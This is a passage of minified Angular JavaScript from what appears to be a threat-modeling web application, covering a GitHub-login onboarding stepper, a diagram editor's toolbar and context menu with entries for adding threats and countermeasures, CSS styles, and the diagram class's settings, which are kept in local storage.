"),u(),s(9,"\n\n    "),m(10,"mat-drawer-content"),s(11,"\n      "),m(12,"div"),s(13,"\n        "),m(14,"div",4),s(15,"\n          "),m(16,"h1"),s(17),oe(18,"translate"),u(),s(19,"\n          "),it(20,"p",5),oe(21,"translate"),s(22,"\n          "),m(23,"mat-stepper",6,7),s(25,"\n            "),m(26,"mat-step"),s(27,"\n              "),ne(28,Fct,2,3,"ng-template",8),s(29,"\n              "),it(30,"p",5),oe(31,"translate"),s(32,"\n              "),m(33,"div"),s(34,"\n                "),m(35,"button",9),he("click",function(){return i.onForkDataClick()}),s(36,"\n                  Use this template\n                  "),m(37,"mat-icon"),s(38,"open_in_new"),u(),s(39,"\n                "),u(),s(40,"\n              "),u(),s(41,"\n              "),m(42,"div"),s(43,"\n                "),m(44,"button",10),s(45),oe(46,"translate"),u(),s(47,"\n              "),u(),s(48,"\n            "),u(),s(49,"\n            "),m(50,"mat-step"),s(51,"\n              "),ne(52,Vct,2,3,"ng-template",8),s(53,"\n              "),it(54,"p",5),oe(55,"translate"),s(56,"\n              "),m(57,"div"),s(58,"\n                "),m(59,"button",9),he("click",function(){return i.onInstallAppClick()}),s(60,"\n                  Install\n                  "),m(61,"mat-icon"),s(62,"open_in_new"),u(),s(63,"\n                "),u(),s(64,"\n              "),u(),s(65,"\n              "),m(66,"div"),s(67,"\n                "),m(68,"button",11),s(69),oe(70,"translate"),u(),s(71,"\n                "),m(72,"button",10),s(73),oe(74,"translate"),u(),s(75,"\n              "),u(),s(76,"\n            "),u(),s(77,"\n            "),m(78,"mat-step"),s(79,"\n              "),ne(80,Bct,2,3,"ng-template",8),s(81,"\n              "),it(82,"p",5),oe(83,"translate"),s(84,"\n              "),m(85,"button",9),he("click",function(){return i.onGithubLogin()}),s(86),oe(87,"translate"),u(),s(88,"\n              "),m(89,"button",12),s(90),oe(91,"translate"),u(),s(92,"\n              "),it(93,"br"),s(94,"\n            "),u(),s(95,"\n          "),u(),s(96,"\n        "),u(),s(97,"\n        "),m(98,"div",13),s(99,"\n          "),ne(100,Hct,16,18,"ng-container",14),s(101,"\n          "),ne(102,Uct,9,4,"ng-container",14),s(103,"\n        "),u(),s(104,"\n      "),u(),s(105,"\n    "),u(),s(106,"\n  "),u(),s(107,"\n  "),it(108,"app-status-bar"),s(109,"\n"),u(),s(110,"\n")),2&e&&(C(14),Ct("first-column-light",!i.theme.IsDarkMode)("first-column-dark",i.theme.IsDarkMode),C(3),ke(re(18,17,"pages.login.create_acc")),C(3),V("innerHTML",re(21,19,"pages.login.pretexthtml"),Hc),C(10),V("innerHTML",re(31,21,"pages.login.step1.deschtml"),Hc),C(15),ke(re(46,23,"tour.next")),C(9),V("innerHTML",re(55,25,"pages.login.step2.deschtml"),Hc),C(15),ke(re(70,27,"tour.prev")),C(4),ke(re(74,29,"tour.next")),C(9),V("innerHTML",re(83,31,"pages.login.step3.deschtml"),Hc),C(4),ct("\n                ",re(87,33,"pages.login.loginViaGithub"),"\n              "),C(3),V("routerLink","/home"),C(1),ct("\n                ",re(91,35,"pages.login.goToProjects"),"\n              "),C(10),V("ngIf",!i.dataService.IsLoggedIn),C(2),V("ngIf",i.dataService.IsLoggedIn))},dependencies:[Ri,Ta,Ea,oa,_u,gu,Od,br,da,YV,mA,JV,pye,_ye,_f,gf,x1,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column[_ngcontent-%COMP%]{float:left;width:50%;padding-left:10px;padding-right:10px;justify-content:center;align-items:center}.first-column-light[_ngcontent-%COMP%]{border-right-color:#000;border-right-style:solid;border-right-width:1px}.first-column-dark[_ngcontent-%COMP%]{border-right-color:#fff;border-right-style:solid;border-right-width:1px}.vertical-center[_ngcontent-%COMP%]{margin:0;position:absolute;top:50%;transform:translateY(-50%)}.vertical-center-right[_ngcontent-%COMP%]{margin:0;position:absolute;top:50%;left:75%;transform:translate(-50%,-50%)}.login[_ngcontent-%COMP%]{border-radius:10px;padding:10px}.login-hover-light[_ngcontent-%COMP%]:hover{background-color:#0000000d}.login-hover-dark[_ngcontent-%COMP%]:hover{background-color:#ffffff0d}"]}),t})()}];let Gct=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,bs.forChild(qct),bs]}),t})(),jct=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,pf,Gct]}),t})();const Qct=[{path:"modeling",component:zG}];let AZ=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,bs.forChild(Qct),bs]}),t})();var Ei=de(4968);const $ct=["ctxMenu"],Kct=["zoomSelect"];function Xct(t,a){if(1&t&&(fi(),it(0,"circle",69)),2&t){const e=B();Rt("fill",e.GetIconColor(e.Dia.CanSetAnchorCount))}}function Yct(t,a){if(1&t&&(fi(),it(0,"circle",70)),2&t){const e=B();Rt("fill",e.GetIconColor(e.Dia.CanSetAnchorCount))}}function Jct(t,a){if(1&t&&(fi(),it(0,"circle",71)),2&t){const e=B();Rt("fill",e.GetIconColor(e.Dia.CanSetAnchorCount))}}function Zct(t,a){if(1&t&&(fi(),it(0,"circle",72)),2&t){const e=B();Rt("fill",e.GetIconColor(e.Dia.CanSetAnchorCount))}}const elt=function(){return[3,4]};function tlt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",2),he("click",function(){be(e);const n=B();return Me(n.Dia.FlowArrowPosition=3==n.Dia.FlowArrowPosition?5:3)}),oe(1,"translate"),s(2,"\n      "),it(3,"fa-icon",73),s(4,"\n    "),u()}if(2&t){const e=B();Ct("toolBtn-Selected",kr(6,elt).includes(e.Dia.FlowArrowPosition)),at("matTooltip",re(1,4,"pages.modeling.diagram.arrowPosBoth")),C(3),V("icon",e.faArrowsAltH)}}function ilt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",3),he("click",function(){be(e);const n=B();return Me(n.Dia.FlowArrowPosition=2==n.Dia.FlowArrowPosition?5:2)}),oe(1,"translate"),s(2,"\n      "),it(3,"fa-icon",73),s(4,"\n    "),u()}if(2&t){const e=B();Ct("toolBtn-Selected",2==e.Dia.FlowArrowPosition),at("matTooltip",re(1,4,"pages.modeling.diagram.arrowPosEnd")),C(3),V("icon",e.faLongArrowAltRight)}}function alt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",2),he("click",function(){be(e);const n=B();return Me(n.Dia.BendFlow=!n.Dia.BendFlow)}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"redo"),u(),s(5,"\n    "),u()}2&t&&(Ct("toolBtn-Selected",B().Dia.BendFlow),at("matTooltip",re(1,3,"pages.modeling.diagram.arrowBend")))}function nlt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",2),he("click",function(){be(e);const n=B();return Me(n.Dia.ShowName=!n.Dia.ShowName)}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"text_rotation_none"),u(),s(5,"\n    "),u()}2&t&&(Ct("toolBtn-Selected",B().Dia.ShowName),at("matTooltip",re(1,3,"pages.modeling.diagram.showName")))}function olt(t,a){if(1&t){const e=Ye();m(0,"button",4),he("click",function(){return be(e),Me(B().Dia.TextIncrease())}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"text_increase"),u(),s(5,"\n    "),u()}if(2&t){const e=B();at("matTooltip",re(1,2,"pages.modeling.diagram.textIncrease")),V("disabled",!e.selectedElement)}}function rlt(t,a){if(1&t){const e=Ye();m(0,"button",4),he("click",function(){return be(e),Me(B().Dia.TextDecrease())}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"text_decrease"),u(),s(5,"\n    "),u()}if(2&t){const e=B();at("matTooltip",re(1,2,"pages.modeling.diagram.textDecrease")),V("disabled",!e.selectedElement)}}function slt(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",4),he("click",function(){return be(e),Me(B().Dia.AddTestCase())}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"checklist"),u(),s(5,"\n    "),u()}if(2&t){const e=B();at("matTooltip",re(1,2,"pages.modeling.diagram.addTestCase")),V("disabled",!e.selectedElement)}}function clt(t,a){if(1&t){const e=Ye();m(0,"button",74),he("click",function(){return be(e),Me(B().Dia.CancelCreateFlow())}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"draw"),u(),s(5,"\n    "),u()}if(2&t){const e=B();at("matTooltip",re(1,2,"pages.modeling.diagram.cancelCreateFlow")),V("disabled",!e.Dia.IsCreatingFlow)}}function llt(t,a){1&t&&(m(0,"button",75),s(1,"Mnemonics"),u()),2&t&&(B(),V("matMenuTriggerFor",Ti(290)))}function dlt(t,a){if(1&t){const e=Ye();m(0,"button",7),s(1,"\n          "),m(2,"mat-slide-toggle",8),he("ngModelChange",function(n){const c=be(e).$implicit;return Me(B().diagram.Settings.GenerationMnemonics[c.ID]=n)})("click",function(n){return n.stopPropagation()}),s(3),u(),s(4,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",i.diagram.Settings.GenerationMnemonics[e.ID]),C(1),ct("\n            ",e.Name,"\n          ")}}function mlt(t,a){if(1&t){const e=Ye();m(0,"button",7),s(1,"\n          "),m(2,"mat-slide-toggle",8),he("ngModelChange",function(n){const c=be(e).$implicit;return Me(B().diagram.Settings.GenerationRules[c.ID]=n)})("click",function(n){return n.stopPropagation()}),s(3),u(),s(4,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",i.diagram.Settings.GenerationRules[e.ID]),C(1),ct("\n            ",e.Name,"\n          ")}}function ult(t,a){if(1&t&&(m(0,"option",76),s(1),oe(2,"number"),u()),2&t){const e=B();V("value",e.Zoom),C(1),ct("",function $k(t,a,e,i){const n=t+22,r=bi(),c=Nc(r,n);return ZC(r,n)?qk(r,hs(),a,c.transform,e,i,c):c.transform(e,i)}(2,2,100*e.Zoom,"1.0-0"),"%")}}function hlt(t,a){if(1&t&&(m(0,"span",84),s(1),u()),2&t){const e=B(2).item;C(1),ke(e.GetProperty("Name"))}}function flt(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){return be(e),Me(B(3).Dia.AddTestCase())}),s(1,"\n          "),m(2,"mat-icon"),s(3,"checklist"),u(),s(4,"\n          "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n        "),u()}2&t&&(C(6),ke(re(7,1,"pages.modeling.diagram.addTestCase")))}function plt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n        "),ne(2,hlt,2,1,"span",80),s(3," \n        "),m(4,"button",81),he("click",function(){return be(e),Me(B(2).Dia.CopyElement())}),s(5,"\n          "),m(6,"mat-icon"),s(7,"content_copy"),u(),s(8,"\n          "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n        "),u(),s(13,"\n        "),m(14,"button",82),he("click",function(){return be(e),Me(B(2).Dia.PasteElement())}),s(15,"\n          "),m(16,"mat-icon"),s(17,"content_paste"),u(),s(18,"\n          "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n        "),u(),s(23,"\n        "),m(24,"button",81),he("click",function(){be(e);const n=B().item;return Me(B().Dia.OnDeleteElement(n))}),s(25,"\n          "),m(26,"mat-icon"),s(27,"delete"),u(),s(28,"\n          "),m(29,"span"),s(30),oe(31,"translate"),u(),s(32,"\n        "),u(),s(33,"\n        "),m(34,"button",81),he("click",function(){return be(e),Me(B(2).Dia.AddThreat())}),s(35,"\n          "),m(36,"mat-icon"),s(37,"flash_on"),u(),s(38,"\n          "),m(39,"span"),s(40),oe(41,"translate"),u(),s(42,"\n        "),u(),s(43,"\n        "),ne(44,flt,9,3,"button",83),s(45,"\n        "),m(46,"button",81),he("click",function(){return be(e),Me(B(2).Dia.AddCountermeasure())}),s(47,"\n          "),m(48,"mat-icon"),s(49,"security"),u(),s(50,"\n          "),m(51,"span"),s(52),oe(53,"translate"),u(),s(54,"\n        "),u(),s(55,"\n        "),m(56,"button",81),he("click",function(){return be(e),Me(B(2).Dia.SendToBack())}),s(57,"\n          "),fi(),m(58,"svg",10),s(59,"\n            "),s(60,"\n            "),it(61,"rect",29),s(62,"\n            "),it(63,"rect",30),s(64,"\n            "),it(65,"rect",31),s(66,"\n            "),it(67,"rect",32),s(68,"\n            "),it(69,"rect",33),s(70,"\n          "),u(),s(71,"\n          "),ln(),m(72,"span"),s(73),oe(74,"translate"),u(),s(75,"\n        "),u(),s(76,"\n        "),m(77,"button",81),he("click",function(){return be(e),Me(B(2).Dia.SendBackwards())}),s(78,"\n          "),fi(),m(79,"svg",10),s(80,"\n            "),s(81,"\n            "),it(82,"rect",34),s(83,"\n            "),it(84,"rect",35),s(85,"\n            "),it(86,"rect",36),s(87,"\n          "),u(),s(88,"\n          "),ln(),m(89,"span"),s(90),oe(91,"translate"),u(),s(92,"\n        "),u(),s(93,"\n        "),m(94,"button",81),he("click",function(){return be(e),Me(B(2).Dia.BringForward())}),s(95,"\n          "),fi(),m(96,"svg",10),s(97,"\n            "),s(98,"\n            "),it(99,"rect",35),s(100,"\n            "),it(101,"rect",36),s(102,"\n            "),it(103,"rect",34),s(104,"\n          "),u(),s(105,"\n          "),ln(),m(106,"span"),s(107),oe(108,"translate"),u(),s(109,"\n        "),u(),s(110,"\n        "),m(111,"button",81),he("click",function(){return be(e),Me(B(2).Dia.BringToFront())}),s(112,"\n          "),fi(),m(113,"svg",10),s(114,"\n            "),s(115,"\n            "),it(116,"rect",30),s(117,"\n            "),it(118,"rect",31),s(119,"\n            "),it(120,"rect",32),s(121,"\n            "),it(122,"rect",33),s(123,"\n            "),it(124,"rect",37),s(125,"\n          "),u(),s(126,"\n          "),ln(),m(127,"span"),s(128),oe(129,"translate"),u(),s(130,"\n        "),u(),s(131,"\n        "),it(132,"mat-divider"),s(133,"\n      "),Mt()}if(2&t){const e=B().item,i=B();C(2),V("ngIf",e),C(8),ke(re(11,36,"general.Copy")),C(4),V("disabled",!i.Dia.CanCopy),C(6),ke(re(21,38,"general.Paste")),C(10),ke(re(31,40,"pages.modeling.diagram.deleteElement")),C(10),ke(re(41,42,"pages.modeling.diagram.addAttackScenario")),C(4),V("ngIf",i.dataService.Project.HasTesting),C(8),ke(re(53,44,"pages.modeling.diagram.addCountermeasure")),C(9),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected)),C(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(4),ke(re(74,46,"pages.modeling.diagram.sendBack")),C(9),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected)),C(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(4),ke(re(91,48,"pages.modeling.diagram.sendBackwards")),C(9),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(4),ke(re(108,50,"pages.modeling.diagram.bringForward")),C(9),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(2),Rt("fill",i.GetContextIconColor(i.Dia.IsObjectSelected))("stroke",i.theme.IsDarkMode?"#424242":"#FFFFFF"),C(4),ke(re(129,52,"pages.modeling.diagram.bringFront"))}}function _lt(t,a){if(1&t){const e=Ye();s(0,"\n      "),ne(1,plt,134,54,"ng-container",77),s(2,"\n      "),m(3,"button",78),he("click",function(){return be(e),Me(B().Dia.SaveImage())}),s(4,"\n        "),m(5,"mat-icon"),s(6,"save"),u(),s(7,"\n        "),m(8,"span"),s(9),oe(10,"translate"),u(),s(11,"\n      "),u(),s(12,"\n      "),m(13,"mat-menu",null,79),s(15,"\n        "),m(16,"button",7),s(17,"\n          "),m(18,"mat-slide-toggle",8),he("ngModelChange",function(n){return be(e),Me(B().Dia.SaveImageWithGrid=n)})("click",function(n){return n.stopPropagation()}),s(19),oe(20,"translate"),u(),s(21,"\n        "),u(),s(22,"\n      "),u(),s(23,"\n    ")}if(2&t){const e=Ti(14),i=B();C(1),V("ngIf",i.selectedElement),C(2),V("matMenuTriggerFor",e),C(6),ke(re(10,5,"pages.modeling.diagram.saveImage")),C(9),V("ngModel",i.Dia.SaveImageWithGrid),C(1),ct("\n            ",re(20,7,"pages.modeling.diagram.saveImageWithGrid"),"\n          ")}}const glt=function(){return[.33,.5,.66,.75,1,1.5,2,2.5,3]};var Zs=(()=>{return(t=Zs||(Zs={})).Mouse="mouse",t.Pan="pan",t.Move="move",Zs;var t})(),Cf=(()=>{return(t=Cf||(Cf={}))[t.None=0]="None",t[t.Selecting=1]="Selecting",t[t.Moving=2]="Moving",Cf;var t})(),ot=(()=>{return(t=ot||(ot={})).canvasID="canvasID",t.name="name",t.ID="ID",t.elementTypeID="elementTypeID",t.myType="myType",t.fa="fa",t.dfs="dfs",t.bendFlow="bendFlow",t.subTargetCheck="subTargetCheck",t.objectCaching="objectCaching",t.selectable="selectable",t.lockMovementX="lockMovementX",t.lockMovementY="lockMovementY",t.lockScalingX="lockScalingX",t.lockScalingY="lockScalingY",t.hasBorders="hasBorders",t.hasControls="hasControls",t.transparentCorners="transparentCorners",t.cornerColor="cornerColor",t.cornerSize="cornerSize",t.opacity="opacity",t.originX="originX",t.originY="originY",t._controlsVisibility="_controlsVisibility",t.path="path",t.pathOffset="pathOffset",t.strokeDashArray="strokeDashArray",t.visible="visible",t.perPixelTargetFind="perPixelTargetFind",t.targetFindTolerance="targetFindTolerance",t.fontSize="fontSize",t.p0ID="p0ID",t.p1ID="p1ID",t.p2ID="p2ID",t.arrowEID="arrowEID",t.arrowSID="arrowSID",t.textID="textID",t.textObjID="textObjID",t.t0ID="t0ID",t.flowID="flowID",t.fa1="fa1",t.fe1="fe1",t.fa2="fa2",t.fe2="fe2",ot;var t})(),wt=(()=>{return(t=wt||(wt={})).Process="P",t.DataStore="DS",t.DataStoreTop="DS-T",t.DataStoreBottom="DS-B",t.ExternalEntity="EE",t.TrustArea="TA",t.PhysicalLink="PL",t.Interface="I",t.DataFlowLine="DF-L",t.DataFlowCircle="DF-C",t.DataFlowPoint="DF-P",t.DataFlowArrowE="DF-AE",t.DataFlowArrowS="DF-AS",t.Device="DEV",t.DeviceReference="DEV-REF",t.DeviceLabel1="DEV-LBL1",t.DeviceLabel1Line="DEV-LBL1-L",t.DeviceLabel2="DEV-LBL2",t.DeviceLabel2Line="DEV-LBL2-L",t.DeviceLabel3="DEV-LBL3",t.DeviceLabel3Line="DEV-LBL3-L",t.DeviceLabel4="DEV-LBL4",t.DeviceLabel4Line="DEV-LBL4-L",t.MobileApp="APP",t.AppLabel1="APP-LBL1",t.AppLabel1Line="APP-LBL1-L",t.AppLabel2="APP-LBL2",t.AppLabel2Line="APP-LBL2-L",t.AppLabel3="APP-LBL3",t.AppLabel3Line="APP-LBL3-L",t.AppLabel4="APP-LBL4",t.AppLabel4Line="APP-LBL4-L",t.Interactor="ACT",t.InteractorHead="ACT-H",t.InteractorBody="ACT-B",t.InteractorArms="ACT-A",t.InteractorLeg1="ACT-L1",t.InteractorLeg2="ACT-L2",t.DeviceInterface="DEV-IF",t.SystemUseCase="SYSUC",t.SystemExternalEntity="SYSEE",t.Annotation="Annotation",t.ElementBorder="ElementBorder",t.ElementName="ElementName",t.ElementType="ElementType",t.ElementPhyElement="ElementPhyElement",t.FlowAnchor="FA",t.TextPosPoint="TXT-POS-P",t.GridLine="GL",wt;var t})(),_i=(()=>{return(t=_i||(_i={})).North="n",t.East="e",t.South="s",t.West="w",t.NorthWest="n-w",t.NorthEast="n-e",t.SouthEast="s-e",t.SouthWest="s-w",t.EasternNorth="en",t.EasternSouth="es",t.WesternNorth="wn",t.WesternSouth="ws",t.NorthernWest="nw",t.NorthernEast="ne",t.SouthernWest="sw",t.SouthernEast="se",_i;var t})();let D2=(()=>{class t{constructor(e,i,n,r,c,d){this.dataService=i,this.theme=n,this.dialog=r,this.locStorage=c,this.translate=d,this.mouseMode=Zs.Mouse,this.xMax=null,this.yMax=null,this.isInitalized=!1,this.isDarkMode=!1,this.blockSelectionChangedAfterReceive=!1,this.blockSelectionChangedAfterSend=!1,this.tmpFlowLine=null,this.tmpFlowLineEndpoint=null,this.blockCreateLine=!1,this.fontSizeConfigs=[{Name:11,Type:8},{Name:12,Type:9},{Name:14,Type:10},{Name:16,Type:12},{Name:18,Type:14},{Name:20,Type:16}],this.StrokeColor="black",this.StrokeWidth=2,this.BackgroundColor="black",this.CanvasScreenWidth=0,this.CanvasScreenHeight=0,this.SaveImageWithGrid=!1,this.mouseMovingState=Cf.None,this.SelectionChanged=new Tt,this.NavTreeChanged=new Tt,this.subscriptionsLineType=[],this.subscriptionsFlowAnchor=[],this.subscriptionsScaling=[],this.isSaving=!1,this.overTimeoutBuffer={},this.arrowVisibilityBuffer={},this.seletedFlow=null,this.intersectionPairs=[],this.blockCheckingIntersection=!1,this.Diagram=e}get currentFontSizeConfig(){return this.fontSizeConfigs[this.FontSizeConfigIndex]}get CanCopy(){return null!=this.copyID}get MouseMode(){return this.mouseMode}set MouseMode(e){this.mouseMode=e,this.Canvas.selection=!1,e==Zs.Mouse?this.Canvas.isDragging&&(this.arrowVisibilityRestore(),this.Canvas.isDragging=!1):e==Zs.Pan?(this.arrowVisibilityStore(),this.Canvas.isDragging=!0):(this.SelectedElement=null,this.Canvas.selection=!0,this.mouseMovingState=Cf.Selecting)}get ShowGrid(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_SHOW_GRID);return i&&(e=JSON.parse(i)),!e||null==e[this.Diagram.DiagramType]||e[this.Diagram.DiagramType]}set ShowGrid(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_SHOW_GRID),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e;let c=d=>{d.forEach(T=>{(d=>{d[ot.myType]==wt.GridLine&&(d[ot.visible]=e)})(T),T._objects&&c(T._objects)})};c(this.Canvas.getObjects()),this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_SHOW_GRID,JSON.stringify(n)),this.Canvas.requestRenderAll(),this.onCanvasModified()}get StickToGrid(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_STICK_GRID);return i&&(e=JSON.parse(i)),!e||null==e[this.Diagram.DiagramType]||e[this.Diagram.DiagramType]}set StickToGrid(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_STICK_GRID),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_STICK_GRID,JSON.stringify(n))}get FlowArrowPosition(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_POS);return i&&(e=JSON.parse(i)),e&&e[this.Diagram.DiagramType]?Number(e[this.Diagram.DiagramType]):this.Diagram.DiagramType==xn.Context?wn.Both:this.Diagram.DiagramType==xn.UseCase?wn.End:wn.Initiator}set FlowArrowPosition(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_POS),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=[wn.Both,wn.Initiator].includes(e)?this instanceof $T?wn.Initiator:wn.Both:e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ARROW_POS,JSON.stringify(n))}get BendFlow(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_BEND);return i&&(e=JSON.parse(i)),e&&null!=e[this.Diagram.DiagramType]?e[this.Diagram.DiagramType]:this.Diagram.DiagramType==xn.DataFlow}set BendFlow(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_BEND),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ARROW_BEND,JSON.stringify(n))}get AnchorCount(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT);return i&&(e=JSON.parse(i)),e&&null!=e[this.Diagram.DiagramType]?e[this.Diagram.DiagramType]:4}set AnchorCount(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT,JSON.stringify(n)),this.Canvas.getObjects().forEach(r=>{r._objects&&r._objects.filter(d=>d[ot.myType]==wt.FlowAnchor).forEach(d=>{8==e?d.set(ot.visible,!0):[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].includes(d[ot.fa])&&d.set(ot.visible,!1)})})}get CanSetAnchorCount(){return[xn.Context,xn.DataFlow].includes(this.Diagram.DiagramType)}get ShowName(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_NAME);return i&&(e=JSON.parse(i)),e&&null!=e[this.Diagram.DiagramType]?e[this.Diagram.DiagramType]:this.Diagram.DiagramType==xn.DataFlow}set ShowName(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_NAME),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ARROW_NAME,JSON.stringify(n))}get FontSizeConfigIndex(){const e=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_TEXTSIZE_INDEX);return null==e?3:Number(e)}set 